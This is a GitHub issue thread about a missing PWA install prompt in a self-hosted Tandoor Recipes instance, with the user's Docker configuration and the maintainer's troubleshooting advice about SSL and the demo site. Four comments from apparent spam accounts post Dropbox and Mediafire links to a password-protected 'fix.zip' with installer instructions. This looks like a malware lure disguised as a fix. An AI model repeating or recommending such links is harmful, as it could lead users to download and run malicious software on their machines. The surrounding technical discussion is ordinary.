### ISSUE TITLE
I cant get a PWA installation prompt 

### ISSUE THREAD

**Issue by LordSexy** [TandoorRecipes/recipes#3272]
### Issue

Hey.
I wanted to install the PWA on Android 13. I got everything configured (reverse proxy!) in a portainer stack. 

When I visit the website from Firefox, Brave (and Chrome) there is no PWA installation request. Do I have to turn it on?
Or just send me a link an tell me to RTFM, if I missed it. 

Sorry for causing inconvenience

### Tandoor Version

1.5.19

### OS Version

Synology NAS - Docker - Portainer

### Setup

Docker / Docker-Compose

### Reverse Proxy

Others (please state below)

### Other

Synology build in (its basically a NGINX Proxy Manager in a nice wrapper

### Environment file

```shell
# ---------------------------------------------------------------------------
# This template contains only required options.
# Visit the docs to find more https://docs.tandoor.dev/system/configuration/
# ---------------------------------------------------------------------------

# random secret key, use for example `base64 /dev/urandom | head -c50` to generate one
SECRET_KEY=12345678901234567890123456789012345678902345678902345678923456789023456789

# allowed hosts (see documentation), should be set to your hostname(s) but might be * (default) for some proxies/providers
# ALLOWED_HOSTS=recipes.mydomain.com

# add only a database password if you want to run with the default postgres, otherwise change settings accordingly
DB_ENGINE=django.db.backends.postgresql
POSTGRES_HOST=db_recipes
POSTGRES_DB=djangodb
POSTGRES_PORT=5432
POSTGRES_USER=djangouser
POSTGRES_PASSWORD=supersafeijustreplacedthishere
```

### Docker-Compose file

```shell
services:
  db_recipes:
    restart: always
    image: postgres:16-alpine
    volumes:
      - /volume1/docker/tendor_portainer/postgresql:/var/lib/postgresql/data


  web_recipes:
    restart: always
    image: vabene1111/recipes
    volumes:
      - staticfiles:/opt/recipes/staticfiles
      # Do not make this a bind mount, see https://docs.tandoor.dev/install/docker/#volumes-vs-bind-mounts
      - nginx_config:/opt/recipes/nginx/conf.d
      - /volume1/docker/tendor_portainer/mediafiles:/opt/recipes/mediafiles
    depends_on:
      - db_recipes

  nginx_recipes:
    image: nginx:mainline-alpine
    restart: always
    ports:
      - 2005:80
    depends_on:
      - web_recipes
    volumes:
      # Do not make this a bind mount, see https://docs.tandoor.dev/install/docker/#volumes-vs-bind-mounts
      - nginx_config:/etc/nginx/conf.d:ro
      - staticfiles:/static:ro
      - /volume1/docker/tendor_portainer/mediafiles:/media:ro

volumes:
  nginx_config:
  staticfiles:
```

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vabene1111** [comment]
typically that option should show up after a few clicks are made on the page, but that depends on the browser. You do have SSL (so an https url) configured right? because I think that is something browsers will block PWA's if not present

**Comment by LordSexy** [comment]
Yeah ofc i got a ssl cert. 
Ill not blame you for my Android Firefox install. I was just hoping you know a little trick to get it running anyways.

Thank you anyways!

**Comment by vabene1111** [comment]
hm m if you have a cert I am not sure what might cause this. You could try the demo (app.tandoor.dev with demo/demo for login) so you can validate if its your browser or your installation

**Comment by LordSexy** [comment]
It works with the demo instance and now I can install it at least with brave. Why? No idea. But whatever :D Thank you for your work
